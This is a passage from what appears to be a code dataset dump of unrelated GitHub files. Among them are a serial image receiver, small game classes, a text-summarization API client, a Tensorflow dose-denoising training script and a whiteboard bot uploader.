img_bytes = ser.readlines()\n img_bytes1 = b\"\".join(img_bytes) #リスト → 文字列 \n ser.close()\n print(\"End\")\n return img_bytes1\n \ndef convert_img(img_bytes):\n ByteToImg = Image.open(io.BytesIO(img_bytes))\n ByteToImg.save('decoded_img_01.jpg')\n \nif __name__ == '__main__':\n while True:\n Check_transfer_1 = ser.readline().strip().decode('utf-8')\n if Check_transfer_1 == 'Ready?':\n Check_transfer_2 = ser.write(b'Ready!')\n break\n\n img_bytes = bytes_receive()\n print('Receive Complete')\n img = convert_img(img_bytes)\n print('Convert Complete')\n print('All Complete')","repo_name":"Koji1116/cansat2021","sub_path":"sensor/communication/xbee_img_receive.py","file_name":"xbee_img_receive.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30154244211","text":"class Monster:\n\n def __init__(self, name, health, mana, strength, dexterity, intelligence):\n self.name = name\n self.health = health\n self.mana = mana\n self.strength = strength\n self.dexterity = dexterity\n self.intelligence = intelligence\n\n\nrat = Monster(\n \"Rat\",\n 5,\n 0,\n 3,\n 5,\n 8\n)\n\ngiant_rat = Monster(\n \"Giant Rat\",\n 5,\n 0,\n 3,\n 5,\n 10\n)\n\nskeleton = Monster(\n \"Skeleton Rat\",\n 10,\n 0,\n 8,\n 8,\n 3\n)\n\n\nnecromancer = Monster(\n \"Necromancer Rat\",\n 100,\n 100,\n 15,\n 20,\n 22\n)\n\nmydict = {\"damage\": 2}\n\n# print(skeleton.name)\n# print(f'HP = {skeleton.health}')\n# print(f'STR = {skeleton.strength}')\n# print()\n\n# for key in [\"name\", \"health\", \"mana\", \"strength\", \"dexterity\", \"intelligence\"]:\n# print(getattr(giant_rat, key, None))\n# print()\n# for key in [\"name\", \"health\", \"mana\", \"strength\", \"dexterity\", \"intelligence\"]:\n# print(getattr(skeleton, key, None))\n# print()\n# while skeleton.health > 0:\n# for key in [\"health\"]:\n# setattr(skeleton, key, skeleton.health-mydict[\"damage\"])\n# for key in [\"name\", \"health\", \"mana\", \"strength\", \"dexterity\", \"intelligence\"]:\n# print(getattr(skeleton, key, None))","repo_name":"rlyyah/rougelike_python","sub_path":"monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24912978272","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 6 09:12:59 2014\n\n@author: manu\n\"\"\"\n\nfrom numpy import *\nfrom scipy.interpolate import Rbf, InterpolatedUnivariateSpline\nimport random\nfrom pylab import *\n\n# setup data\nx = np.linspace(0, 10, 9)\ny = np.sin(x)\nxi = np.linspace(0, 10, 101)\n\n# use fitpack2 method\nius = InterpolatedUnivariateSpline(x, y)\nyi = ius(xi)\n\nM=360\nent=zeros((360,2))\nanglelist=list(xrange(0,360))\nfor i in range(4,M):\n x=sort(random.sample(anglelist,i))#linspace(0,360,i)\n y=randn(i)\n xi=linspace(0,360,M)\n ius = InterpolatedUnivariateSpline(x, y)\n yi = ius(xi)\n ent[i,0]=entropy(y,round(sqrt(i)))\n ent[i,1]=entropy(yi,round(sqrt(M)))\n\nplot(range(360),(ent[:,0]))\nplot(range(360),(ent[:,1]))","repo_name":"manuamador/EntropyRC","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21533111702","text":"def find_grade(s):\n \"\"\"\n :param s:\n int, your score\n :return:\n your grade\n \"\"\"\n if s < 0 or s > 60:\n return 'Invalid input'\n elif s <= 35:\n return 'Failed attempt'\n elif s <= 40:\n return 4.0\n elif s <= 45:\n return 4.5\n elif s <= 50:\n return 5.0\n elif s <= 55:\n return 5.5\n elif s <= 60:\n return 6.0\n\n\ngrade = find_grade(58)\nprint(grade)\n","repo_name":"Mario-bgt/MAT_101_Programming","sub_path":"sheet2_mario_baumgartner/ex02.3.py","file_name":"ex02.3.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20383238921","text":"import requests\n\n\ndef summarize(api_endpoint, api_key, num_sentences, text_to_summarize):\n \"\"\"\n SMMRY - text summarization API\n :param api_endpoint: string url\n :param api_key: string credential\n :param text_to_summarize: plain text article\n :param num_sentences: int of size of the summary\n :return: requests.Response\n \"\"\"\n url = \"{}/?SM_API_KEY={}&SM_LENGTH={}\".format(\n api_endpoint, api_key, num_sentences)\n data = {'sm_api_input': text_to_summarize}\n resp = requests.post(url, data=data)\n return resp\n","repo_name":"bryand1/textsummarization","sub_path":"api/smmry.py","file_name":"smmry.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"490476419","text":"def _matching_providers(target_or_targets, name_or_provider):\n \"\"\"Returns a list of the given provider from one or more targets.\n\n This function supports legacy providers (referenced by name) and modern\n providers (referenced by their provider object).\n\n Args:\n target_or_targets: A target or list of targets whose providers should be\n searched.\n name_or_provider: The string name of the legacy provider or the reference\n to a modern provider to return.\n Returns:\n A list of providers from the given targets. This list may have fewer\n elements than the given number of targets (including being empty) if not all\n targets propagate the provider.\n \"\"\"\n if type(target_or_targets) == type([]):\n targets = target_or_targets\n else:\n targets = [target_or_targets]\n\n # If name_or_provider is a string, find it as a legacy provider.\n if type(name_or_provider) == type(\"\"):\n return [getattr(x, name_or_provider) for x in targets\n if hasattr(x, name_or_provider)]\n\n # Otherwise, find it as a modern provider.\n return [x[name_or_provider] for x in targets if name_or_provider in x]\n\n\n# Define the loadable module that lists the exported symbols in this file.\nprovider_support = struct(\n matching_providers=_matching_providers,\n)\n","repo_name":"shamanskyh/rules_apple","sub_path":"apple/bundling/provider_support.bzl","file_name":"provider_support.bzl","file_ext":"bzl","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"30416056601","text":"def f_gold ( str ) :\n n = len ( str )\n dp = [ [ 0 ] * ( n + 1 ) ] * ( n + 1 )\n for i in range ( 1 , n + 1 ) :\n for j in range ( 1 , n + 1 ) :\n if ( str [ i - 1 ] == str [ j - 1 ] and i != j ) :\n dp [ i ] [ j ] = 1 + dp [ i - 1 ] [ j - 1 ]\n else :\n dp [ i ] [ j ] = max ( dp [ i ] [ j - 1 ] , dp [ i - 1 ] [ j ] )\n return dp [ n ] [ n ]\n\n\n#TOFILL\n\nif __name__ == '__main__':\n param = [\n ('JxZFz',),\n ('7648992235770',),\n ('11100000',),\n ('cRN SgYjPsctJ',),\n ('434',),\n ('1',),\n ('JRfZIAsbrPBZ',),\n ('03779368305592',),\n ('1111000',),\n ('BkULuIi',)\n ]\n n_success = 0\n for i, parameters_set in enumerate(param):\n if f_filled(*parameters_set) == f_gold(*parameters_set):\n n_success+=1\n print(\"#Results: %i, %i\" % (n_success, len(param)))","repo_name":"facebookresearch/TransCoder","sub_path":"data/evaluation/geeks_for_geeks_successful_test_scripts/python/LONGEST_REPEATING_SUBSEQUENCE.py","file_name":"LONGEST_REPEATING_SUBSEQUENCE.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1646,"dataset":"github-code","pt":"3"} +{"seq_id":"43344524869","text":"#coding:euc-kr\nimport sqlite3\n#\ndef select_b():\n\n conn = sqlite3.connect(\"testdb.db\")\n\n cur = conn.cursor()\n\n cur.execute('select * from test')\n\n print('[1] 전체 데이터 출력하기')\n\n rs = cur.fetchall()\n\n for book in rs :\n print(book)\n\n conn.close()\n#\nif __name__ == \"__main__\":\n select_b()","repo_name":"richinhim/python_1216","sub_path":"db_demo1.py","file_name":"db_demo1.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33290515282","text":"__license__ = \"GNU GPLv3\"\n__docformat__ = 'reStructuredText'\n\nfrom time import time\nfrom .feedbacker import send_feedback, Message\nfrom .mailer import send_mail, send_reminder\nfrom .read_config import get_key, get_bool_key\nfrom .slack_processor import SlackBot\n\n\ndef upload_to_slack(pictures, slack_bot):\n \"\"\"Uploads the pictures to slack and a message depending on request situation.\n\n Checks the temp request file for a request and sends messages depending on,\n if there is a request.\n If the last request ran out, this person is getting notified.\n If not, tell person, trigger has been received.\n Upload to slack\n \"\"\"\n channel = get_key('Slack', 'channel_name')\n\n request = slack_bot.queue.get()\n\n if request['request']:\n if time() <= request['ts']:\n message = \"Received the trigger in time, you will get the photo!\"\n channel = request['channel']\n\n else:\n # Hmm, this should never happen ... keep it in, just to be sure\n message = \"Hey, sorry but you missed your request window, but I told you that.\"\n\n SlackBot.send_ephemeral_message(SlackBot,\n msg=message,\n user=request['user'],\n channel=request['channel'])\n\n # Make sure we pick the right file\n\n SlackBot.upload_file(SlackBot, pictures[0], channel)\n\n send_feedback(Message.UPLOAD)\n\n if get_bool_key('Output', 'enhance'):\n SlackBot.upload_file(SlackBot, pictures[1], channel)\n\n if request['request']:\n request['request'] = False\n request['user'] = None\n request['real_name'] = None\n request['channel'] = None\n request['ts'] = float(get_key('Slack', 'request_period'))\n slack_bot.queue.put(request)\n print(\"after slack upload\")\n\n\ndef upload_by_mail(pictures, mail_list):\n \"\"\"Gather mail list, send task to upload.\"\"\"\n addresses = []\n print(mail_list)\n # Mail can be activated but not mapped to this button\n if len(mail_list) > 0:\n print(\"mail list has mails in it\")\n for mail_num in mail_list:\n addresses.append(get_key(mail_num, \"address\"))\n print(\"after action\")\n\n send_mail(addresses, pictures)\n else:\n print(\"Mail activated but no mails choosen on this button\")\n print(\"after mail upload\")\n\n\ndef get_upload_targets():\n \"\"\"Construct and return unset dict of targets.\"\"\"\n # Possible actions:\n # normal All available targets\n # all_mail All available emails\n # [slack]{, Mail#} Only specific emails and/or slack\n upload_targets = {'slack': False}\n for mail in range(int(get_key('Output', 'num_mail'))):\n upload_targets['mail_' + str(mail)] = False\n\n return upload_targets\n\n\ndef set_upload_targets(actions):\n \"\"\"Translate meta targets into actual targets, set them accordingly and return.\"\"\"\n upload_targets = get_upload_targets()\n slack = get_bool_key('Output', 'slack')\n email = get_bool_key('Output', 'mail')\n # A little bit long but very explicit about what should happen\n if actions[0] == \"normal\":\n if slack:\n upload_targets['slack'] = True\n if email:\n for mail in range(int(get_key('Output', 'num_mail'))):\n upload_targets['Mail' + str(mail)] = True\n elif actions[0] == \"all_mail\":\n if email:\n for mail in range(int(get_key('Output', 'num_mail'))):\n upload_targets['Mail' + str(mail)] = True\n else:\n for action in actions:\n if action in upload_targets:\n upload_targets[action] = True\n\n return upload_targets\n\n\ndef save_all_targets(all_targets, targets):\n \"\"\"Set actual targets from button to dict.\"\"\"\n # FIXME: Seems a bit convoluted.\n for action, activated in targets.items():\n all_targets[action] = activated or all_targets[action]\n return all_targets\n\n\ndef send_reminders(all_targets):\n \"\"\"Send reminders for unsent pictures because of internet outage.\"\"\"\n mail_list = []\n msg = \"There are unsent pictures on the Whiteboardbot SD-Card, \\\n because of an Internet outage on the last trigger. \\\n They are automatically going to get deleted in 30 days.\"\n for action, activated in all_targets.items():\n if activated:\n if action == 'slack':\n SlackBot.send_message(SlackBot, msg, attachment=None,\n channel=get_key(\"Slack\", \"channel_name\"))\n else:\n mail_list.append(action)\n if len(mail_list) > 0:\n addresses = []\n print(mail_list)\n for mail_num in mail_list:\n addresses.append(get_key(mail_num, \"address\"))\n # TODO check if this handover worked correctly\n send_reminder(addresses, msg)\n\n return time()\n\n\ndef upload(button, pictures, enhancer=None, slack_bot=None):\n \"\"\"Check upload targets and upload accordingly.\"\"\"\n # TODO Test this\n\n # bool(int('1'))) ? I know, I'm fun at parties\n email = get_bool_key('Output', 'mail')\n\n actions = eval(button['action'])\n\n upload_targets = set_upload_targets(actions)\n\n mail_list = []\n # Why trust positions of file names, if we could trust,\n # that files ready for upload are always *.jpg\n uploads = []\n\n for picture in pictures:\n if picture.find(\".jpg\") != -1:\n uploads.append(picture)\n if enhancer is not None:\n enhancer.join() # Waits until enhancer terminates\n\n for action, activated in upload_targets.items():\n if activated:\n if action == 'slack':\n upload_to_slack(uploads, slack_bot)\n else: # Can only be either slack or mail\n mail_list.append(action)\n if email:\n upload_by_mail(uploads, mail_list)\n\n print(\"done uploading\")\n","repo_name":"alindl/whiteboardbot","sub_path":"uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25336153090","text":"# recursion\r\n# Runtime: 52 ms, faster than 41.56% of Python3 online submissions for Trim a Binary Search Tree.\r\n# Memory Usage: 16.8 MB, less than 100.00% of Python3 online submissions for Trim a Binary Search Tree.\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n def trimBST(self, root: TreeNode, L: int, R: int) -> TreeNode:\r\n if not root:\r\n return None\r\n elif root.val > R:\r\n return self.trimBST(root.left, L, R)\r\n elif root.val < L:\r\n return self.trimBST(root.right, L, R)\r\n else:\r\n root.left = self.trimBST(root.left, L, R)\r\n root.right = self.trimBST(root.right, L, R)\r\n return root\r\n","repo_name":"daidai21/Leetcode","sub_path":"Algorithms/Python3.x/669-Trim_a_Binary_Search_Tree.py","file_name":"669-Trim_a_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"43598721639","text":"import sys\nimport os\nimport json\nimport shutil\nfrom os.path import join as pjoin\nimport logging\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom pprint import pprint, pformat\n\nimport absl.logging\nimport numpy as np\nimport scipy.stats\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom . import actions, argparser, weights, losses\nfrom .dataloader import DataLoaderNpyFiles\nfrom .models.unetdenoiser import UNetDenoiser, UNetDenoiserStatic, ModelWrapper, pad_for_unet, unpad_from_unet\nfrom .utils import get_unique_run_name, load_bin, save_bin, save_config, load_config, combine_config\nfrom .tf_functions import tf_normalize, tf_log\n\n# tf.autograph.set_verbosity(6, alsologtostdout=True)\n# tf.debugging.set_log_device_placement(True)\n\ntimestamp = datetime.now().strftime(\"%Y-%m-%d_%T\")\n\nlogger = logging.getLogger(\"MCDose.\"+__name__)\nIOPaths = namedtuple('IOPaths', ('rundir', 'logdir', 'checkpointdir',\n 'tflogdir', 'resultsdir', 'datadir'))\n\n\ndef main():\n # configuration common to all \"actions\"\n ## workaround to intrusive abseil logger in TF2.0 (double logging)\n logging.root.removeHandler(absl.logging._absl_handler)\n absl.logging._warn_preinit_stderr = False\n rootlogger = logging.getLogger('MCDose')\n rootlogger.setLevel(args.loglevel)\n rootlogger.addHandler( logging.StreamHandler() )\n\n if args.seed:\n np.random.seed(args.seed)\n\n distribute_strategy = None\n if args.cpu:\n # set GPU restrictions\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ''\n logger.debug(\"Processing Mode: CPU\\n\")\n distribute_strategy = default_distribute_strategy(cpu=True)\n else:\n # set GPU restrictions\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.gpu)\n logger.debug(\"Processing Mode: GPU (#{})\\n\".format(args.gpu))\n distribute_strategy = default_distribute_strategy()\n\n # check eager mode\n logger.info('Tensorflow is running in {} mode'.format(\n 'EAGER' if tf.executing_eagerly() else \"GRAPH\"\n ))\n\n # initialize global runs folder\n allrunsdir = args.rundir\n os.makedirs(allrunsdir, exist_ok=True)\n\n # One-Off Actions\n if args.clean_runs:\n clean_runs(allrunsdir)\n sys.exit(0)\n\n # decide on this run's name\n rundir = None\n if args.run is not None:\n # trying to specify an existing run...match on integer, not string\n for d in os.listdir(allrunsdir):\n try:\n if os.path.isdir(pjoin(allrunsdir, d)) and int(d)==int(args.run):\n rundir = d\n break\n except: pass\n\n if rundir is None:\n rundir = get_unique_run_name(allrunsdir)\n rundir = pjoin(allrunsdir, rundir)\n\n # configure run paths with optional memo\n memo = (('-'+args.memo) if args.memo else '')\n rundir = rundir+memo\n iopaths = IOPaths(**{\n 'rundir': rundir,\n 'logdir': pjoin(rundir, 'logs'),\n 'checkpointdir': pjoin(rundir, 'checkpoints'),\n 'tflogdir': pjoin(rundir, 'tflogs'),\n 'resultsdir': pjoin(rundir, 'results' + memo),\n 'datadir': args.datadir,\n })\n # ensure output directories exist\n os.makedirs(rundir, exist_ok=True)\n for d in (iopaths.checkpointdir,\n iopaths.logdir,\n iopaths.tflogdir,\n iopaths.resultsdir):\n os.makedirs(d, exist_ok=True)\n\n # combine cmdline args, general config, and run config (if existing run is used)\n try:\n config = load_config(iopaths.rundir)\n except FileNotFoundError:\n config = load_config(args.config)\n config = combine_config(\n {\n 'timestamp': timestamp,\n 'datadir': iopaths.datadir,\n 'seed': args.seed,\n 'memo': args.memo,\n },\n config,\n )\n # override config settings with cmdline args\n config = combine_config(\n {\n 'batch_size': vars(args).get('batch_size', None),\n },\n config,\n )\n save_config(iopaths.rundir, config)\n\n # initiate logging\n setup_logging(args.action, iopaths)\n\n # launch selected action\n actionfunc = globals()[args.action]\n if callable(actionfunc):\n actionfunc(config, iopaths, distribute_strategy)\n else:\n raise ValueError('Action \"{}\" is not supported'.format(args.action))\n sys.exit(1)\n\ndef setup_logging(action, iopaths):\n # deterimine runtime state\n action = args.action\n\n # finish logging setup\n logfilename = pjoin(iopaths.logdir, 'log-'+action+'.txt')\n filehandler = logging.FileHandler(logfilename)\n rootlogger = logging.getLogger('MCDose')\n rootlogger.addHandler( filehandler )\n tflogger = tf.get_logger()\n tflogger.addHandler(filehandler)\n\ndef train(config, iopaths, distribute_strategy):\n # override config settings with cmdline args\n config = combine_config(\n {\n 'learning_rate': vars(args).get('learning_rate', None),\n 'learning_rate_decay': vars(args).get('learning_rate_decay', None),\n 'nepochs': vars(args).get('nepochs', None),\n 'steps_per_epoch': vars(args).get('steps_per_epoch', None),\n },\n config,\n )\n\n # set defaults if they havent been set on cmdline or in config file\n config['batch_size'] = config.get('batch_size', 30)\n config['learning_rate'] = config.get('learning_rate', 1e-2)\n config['learning_rate_decay'] = config.get('learning_rate_decay', 0.985)\n\n save_config(iopaths.rundir, config)\n\n # setup loss function per-sample weighting\n # TODO: refactor into common selector class\n wfuncconfig = config['sample_weights']\n supported_wfuncs = {\n None: lambda **kwargs: None,\n 'lin_norm_sum': weights.sample_lin_norm_sum,\n 'exp_norm_sum': weights.sample_exp_norm_sum,\n }\n wfunctype = wfuncconfig['type']\n if wfunctype not in supported_wfuncs:\n raise ValueError('Loss weighting function \"{}\" is not supported. Must be one of {!s}'.format(wfunctype, list(supported_wfuncs.keys())))\n wfunc = supported_wfuncs[wfunctype](**wfuncconfig.get(wfunctype, {}))\n\n logger.info('Loading TRAINING data from \"{}\":'.format(iopaths.datadir))\n if not iopaths.datadir or not os.path.isdir(iopaths.datadir):\n raise RuntimeError('Training data folder (datadir) could not be located at \"{}\"'.format(iopaths.datadir))\n train_dataloader = DataLoaderNpyFiles.fromFolder(\n pjoin(iopaths.datadir, 'train'),\n config['batch_size'],\n weight_func=wfunc,\n full_batches_only=True,\n cache_size=args.cache_size,\n limit=args.cache_size if args.cache_only else None,\n randomization=DataLoaderNpyFiles.Randomization.Shuffle\n )\n val_dataloader = DataLoaderNpyFiles.fromFolder(\n pjoin(iopaths.datadir, 'validate'),\n config['batch_size'],\n weight_func=wfunc,\n full_batches_only=False,\n cache_size=args.cache_size,\n limit=args.cache_size if args.cache_only else None,\n randomization=DataLoaderNpyFiles.Randomization.NoShuffle\n )\n\n # copy normalization statistics if available in dataset\n statsfile = pjoin(iopaths.datadir, 'stats.json')\n if os.path.isfile(statsfile):\n shutil.copy2(statsfile, pjoin(iopaths.rundir, 'normstats.json'))\n\n if args.debug:\n ndebugbatches = 3\n logger.info('Only using {} batches for debugging'.format(ndebugbatches))\n train_dataloader.num_batches = ndebugbatches\n val_dataloader.num_batches = ndebugbatches\n\n # optionally, train on subset of dataset\n config['steps_per_epoch'] = max(1, min(len(train_dataloader),\n config.get('steps_per_epoch') if config.get('steps_per_epoch', None) is not None else len(train_dataloader)\n ))\n\n # is user hoping to load existing model, or requiring it?\n if args.resume:\n load_model = 'force'\n elif args.run:\n load_model = 'try'\n else:\n load_model = False\n\n model = create_model(config['model'], distribute_strategy, load_model=load_model, checkpointdir=iopaths.checkpointdir)\n prepare_model(model, train_dataloader, config, distribute_strategy=distribute_strategy)\n\n\n actions.train_custom(model, train_dataloader, val_dataloader, config, iopaths,\n distribute_strategy, 0, iopaths.tflogdir)\n # actions.train(**{\n # 'model': model,\n # 'train_dataloader': train_dataloader,\n # 'val_dataloader': val_dataloader,\n # 'config': config,\n # 'iopaths': iopaths,\n # 'distribute_strategy': distribute_strategy,\n # 'gamma_freq': (-1 if not args.gamma else 20),\n # 'tflogdir': iopaths.tflogdir,\n # })\n\n\ndef test(config, iopaths, distribute_strategy):\n \"\"\"average over all test set slices\"\"\"\n # test trained model\n logger.info('Loading TESTING data:')\n test_dataloader = DataLoaderNpyFiles.fromFolder(pjoin(iopaths.datadir, 'test'), config['batch_size'], full_batches_only=False)\n\n # force testing on single GPU\n distribute_strategy = default_distribute_strategy(single_device=True)\n\n model = get_trained_model(\n config['model'],\n weights=iopaths.checkpointdir,\n normstats=pjoin(iopaths.rundir, 'normstats.json'),\n distribute_strategy=distribute_strategy,\n )\n\n inputs = keras.Input(shape=(None, None, None, 2))\n noop_model = keras.Model(inputs, inputs[...,0,None])\n\n for this_model, baseline in ((model, False), (noop_model, True)):\n # actions.test(this_model, test_dataloader, config, iopaths, distribute_strategy, test_plots=args.test_plots,\n actions.test_custom(this_model, test_dataloader, config, iopaths, distribute_strategy, test_plots=args.test_plots,\n baseline=baseline, gamma=args.gamma)\n\n\ndef predict(config, iopaths, distribute_strategy):\n assert len(args.data_in) > 0\n assert len(args.data_size) > 0\n\n model = get_trained_model(\n config['model'],\n weights=iopaths.checkpointdir,\n normstats=pjoin(iopaths.rundir, 'normstats.json'),\n distribute_strategy=distribute_strategy,\n )\n\n for ii, fname in enumerate(args.data_in):\n assert os.path.isfile(fname)\n inputs = load_bin(fname, args.data_size, add_channel_axis=True, norm=True)\n\n pred_dose = model.predict(inputs, batch_size=config['batch_size'])\n\n if len(args.data_in)>1:\n outname = args.pred_out+str(ii)+'.bin'\n else:\n outname = args.pred_out\n save_bin(outname, pred_dose[:,:,:,0] )\n\n\ndef create_model(modelconfig, distribute_strategy=None, load_model=False, checkpointdir=None):\n \"\"\" modelconfig is expected to be the subset of the full config, specific to the model \"\"\"\n if distribute_strategy is None:\n distribute_strategy = default_distribute_strategy()\n\n # only proceed to create model if failed to load\n with distribute_strategy.scope():\n supported_models = {\n 'static': ModelWrapper(UNetDenoiserStatic),\n 'unet': UNetDenoiser,\n }\n modeltype = modelconfig['type']\n if modeltype not in supported_models:\n raise ValueError('Model \"{}\" is not supported. Must be one of {!s}'.format(modeltype, list(supported_models.keys())))\n model = supported_models[modeltype](**modelconfig.get(modeltype, {}))\n\n if load_model:\n if os.path.isfile(checkpointdir):\n model_path = checkpointdir\n else:\n model_path = pjoin(checkpointdir, 'weights.hdf5')\n\n try:\n model.load_weights(model_path)\n logger.info('Loaded model from \"{}\"'.format(model_path))\n except Exception as e:\n if load_model == 'force':\n logger.error('Failed to reload model checkpoint from \"{}\"'.format(model_path))\n raise\n elif load_model == 'try':\n logger.warning('Failed to reload model checkpoint from \"{}\". Randomly initializing model'.format(model_path))\n else:\n logger.error('model load strategy \"{!s}\" is invalid. Must be one of {!s}'.format(load_model, ['force', 'try']))\n sys.exit(1)\n\n return model\n\ndef prepare_model(model, dataloader, config, distribute_strategy):\n lr_schedule = keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate=float(config['learning_rate']),\n decay_steps=int(config.get('steps_per_epoch')) if config.get('steps_per_epoch', None) is not None else len(dataloader),\n decay_rate=float(config['learning_rate_decay']),\n staircase=False,\n )\n\n # configure optimizer\n optconfig = config['optimizer']\n supported_optimizers = {\n 'sgd': keras.optimizers.SGD,\n 'adam': keras.optimizers.Adam,\n 'rmsprop': keras.optimizers.RMSprop,\n }\n opttype = optconfig['type']\n if opttype not in supported_optimizers:\n raise ValueError('Optimizer \"{}\" is not supported. Must be one of {!s}'.format(opttype, list(supported_optimizers.keys())))\n with distribute_strategy.scope():\n optimizer = supported_optimizers[opttype](**optconfig.get(opttype, {}), learning_rate=lr_schedule)\n\n # configure loss function\n lossconfig = config['loss']\n supported_losses = {\n 'mse': keras.losses.MeanSquaredError,\n 'mae': keras.losses.MeanAbsoluteError,\n 'mse_tv': losses.MeanSquaredErrorTV,\n }\n losstype = lossconfig['type']\n if losstype not in supported_losses:\n raise ValueError('Loss function \"{}\" is not supported. Must be one of {!s}'.format(losstype, list(supported_losses.keys())))\n loss_function = supported_losses[losstype](**lossconfig.get(losstype, {}))\n\n # finalize model based on input data shape\n with distribute_strategy.scope():\n model.compile(\n optimizer=optimizer,\n loss=loss_function,\n metrics=[\n keras.metrics.MeanSquaredError(),\n keras.metrics.MeanAbsoluteError(),\n # metrics.NMAEMetric(),\n # metrics.MaskedNMAEMetric(threshold=0.2),\n ],\n )\n\n input_shape = dataloader[0][0].shape\n model.build((None, *input_shape[1:]))\n\n model.summary()\n return model\n\ntrained_model = None\ndef get_trained_model(config, weights, normstats=None, distribute_strategy=None):\n global trained_model\n if trained_model:\n return trained_model\n if isinstance(config, str):\n config = load_config(config)['model']\n if not isinstance(distribute_strategy, tf.distribute.Strategy):\n distribute_strategy = default_distribute_strategy()\n\n model = create_model(config, distribute_strategy, load_model='force', checkpointdir=weights)\n\n # Wrap model with normalization prestage matching that from training\n if normstats:\n if isinstance(normstats, str):\n with open(normstats, 'r') as fd:\n stats = json.load(fd)\n\n mean = tf.constant([stats['mean'][0], stats['mean'][2]], dtype=tf.float32, shape=(1,1,1,1,2))\n std = tf.constant([stats['std'][0], stats['std'][2]], dtype=tf.float32, shape=(1,1,1,1,2))\n inputs = keras.Input(shape=(None,None,None,2), dtype=tf.float32)\n x = (inputs-mean)/std # normalize\n\n x, orig_size = pad_for_unet(x, nscales=3)\n x = model(x) # predict\n x = unpad_from_unet(x, orig_size)\n\n outputs = x*std[...,0,None]+mean[...,0,None] # un-normalize\n model = keras.Model(inputs, outputs)\n trained_model = model\n return model\n\ndef default_distribute_strategy(cpu=False, single_device=False):\n if cpu:\n return tf.distribute.OneDeviceStrategy(device='/cpu:0')\n\n devices = tf.config.list_logical_devices(\"GPU\")\n if not devices:\n return tf.distribute.OneDeviceStrategy(device='/cpu:0')\n elif devices and len(devices)>1 and not single_device:\n return tf.distribute.MirroredStrategy(devices=devices)\n elif devices and len(devices)==1 or single_device:\n return tf.distribute.OneDeviceStrategy(device=devices[0])\n\ndef clean_runs(allrunsdir):\n \"\"\"Analyze each 'run' folder in 'allrunsdir' and delete those that have no valuable training data, such as\n a valid training checkpoint or tflogs files\"\"\"\n runs_to_delete = []\n for d in sorted(os.listdir(allrunsdir)):\n rundir = pjoin(allrunsdir, d)\n checkpoint_index = pjoin(rundir, 'checkpoints', 'checkpoint')\n weights_file = pjoin(rundir, 'checkpoints', 'weights.hdf5')\n if os.path.isfile(checkpoint_index) or os.path.isfile(weights_file):\n continue\n else:\n runs_to_delete.append(rundir)\n\n if not runs_to_delete:\n logger.info('Nothing to delete. exiting...')\n sys.exit(0)\n\n logger.warning(\"Runs to be deleted: \\n{}\".format(pformat(runs_to_delete)))\n user_response = input(\"Are you sure you want to delete these runs [y/N]: \")\n if not user_response.lower() in ('y', 'yes'):\n logger.warning('Aborted!')\n else:\n for rundir in runs_to_delete:\n try:\n shutil.rmtree(rundir)\n logger.info('Deleted run directory \"{}\"'.format(rundir))\n except Exception as e:\n logger.warning('Failed to delete run directory \"{}\"'.format(rundir))\n logger.debug('Error details: {!s}'.format(e))\n\n#=================================================================================\n\n# Entry point for CLI\nif __name__ == \"__main__\":\n args = argparser.parse_args()\n main()\n","repo_name":"qihuilyu/P2T","sub_path":"MC simulation/mcdose/mcdose/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":17745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12290118298","text":"import pygame \nvec = pygame.math.Vector2\n\n\nclass Personagem1(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/personagem/personagem1frente.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 475\n self.rect.left = 575\n self.rect.left = 200\n self.rect.right = 210\n\nclass Personagem2(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/personagem/personagem2frente.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 475\n self.rect.left = 575\n self.rect.left = 200\n self.rect.right = 405\n\nclass Personagem(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/personagem/personagem1frente_min.png\")\n self.rect = self.image.get_rect()\n self.rect.center= (400,100)\n self.rect.top = 800\n self.rect.left = 228\n self.rect.right = 228\n self.pos = vec(800,800)\n self.vel = vec(0, 0)\n self.acc = vec(0, 0)\n\n def update(self):\n self.acc = vec(0, 0)\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n self.acc.x = -0,5\n if 